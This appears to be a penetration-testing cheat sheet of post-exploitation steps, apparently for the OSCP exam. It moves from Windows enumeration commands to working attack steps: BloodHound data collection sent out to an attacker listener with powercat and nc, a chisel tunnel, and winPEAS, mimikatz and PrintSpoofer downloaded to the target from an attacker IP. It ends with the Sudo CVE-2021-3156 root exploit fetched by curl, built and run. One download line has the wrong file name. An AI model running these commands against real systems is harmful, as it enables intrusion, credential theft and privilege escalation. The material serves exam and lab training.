Post Exploitation
HOST ENUMERATION WINDOWS¶
General Information¶
User Information¶
Network Information¶
Interesting Locations¶
Explorer - view - hidden items ( turn on show hidden items )
Check users documents,downloads,desktops¶
dir c:\windows\prefetch ( admin ) = see what executables have been ran
dir /a:h
dir /o:d /t:w c:\windows\system32
dir /o:d /t:w c:\windows\system32\winevt\logs
dir /o:d /t:w c:\windows\temp
reg query hklm\software\microsoft\windows\currentversion\run /s (don't forget about hkcu) and runonce
Process and Services¶
tasklist /v
tasklist /svc
tasklist /svc | findstr /i "PID"
services.msc ( gui )
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a
sc query <service name>
schtasks
task sch ( gui )
schtasks /query /fo LIST /v
schtasks /query
SharpHound Collection¶
On Kali:¶
On Target:¶
Bypass Execution Privs Import Module Execution Invoke-BloodhoundInvoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "oscp.exam_Audit" -ZipFilename oscp.exam_Audit.zip
Setup Bloodhound¶
Using Powercat to Transfer Files:¶
On Kali:¶
locate powercat.ps1
cp /usr/share/windows-resources/powercat/powercat.ps1 .
nc -nvlp 4444 > NAME.zip
On Windows:¶
powershell iwr -uri http://IP/powercat.ps1 -Outfile C:\Users\Public\powercat.ps1
. C:\Users\Public\powercat.ps1
powercat -c IP -p 4444 -i C:\Users\Public\AUDIT.zip -v
Setup Tunnel¶
On Kali: ( If not already done):
https://github.com/jpillora/chisel/releases/tag/v1.7.7
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.gz
gzip -dk chisel.gz
mv chisel chisel.exe
Host Chisel on Kali¶
Connect from Target:¶
Download File:
Execute: Example Proxychains ConfOn Kali: your proxychains should be default.
cat /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
WinPEAs Script¶
On Kali:¶
We grab a winpeasx64.exe and mimikatz since we know from systeminfo it's x64.
locate winpeas
cp /usr/share/peass/winpeas/winPEASx64.exe .
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
webup or load in ~/pwnshare/tools and use WebDAV
On Target:¶
powershell iwr -uri http://192.168.49.123/winPEASx64.exe -Outfile C:\Users\Public\winPEASx64.exe
Run it:
C:\Users\Public\winPEASx64.exe
Print Spoofer¶
On Kali:¶
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer64.exe
On Target:¶
powershell iwr -uri http://192.168.49.123/winPEASx64.exe -Outfile C:\Users\Public\PrintSpoofer64.exe
Run it:
C:\Users\Public\PrintSpoofer64.exe
Check SUIDS but nothing interesting.¶
Sude 1.8.31 Exploit - CVE-2021-3156¶
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
curl http://192.168.45.233:8088/shellcode.c -o shellcode.c
curl http://192.168.45.233:8088/exploit.c -o exploit.c
curl http://192.168.45.233:8088/Makefile -o Makefile
make
./exploit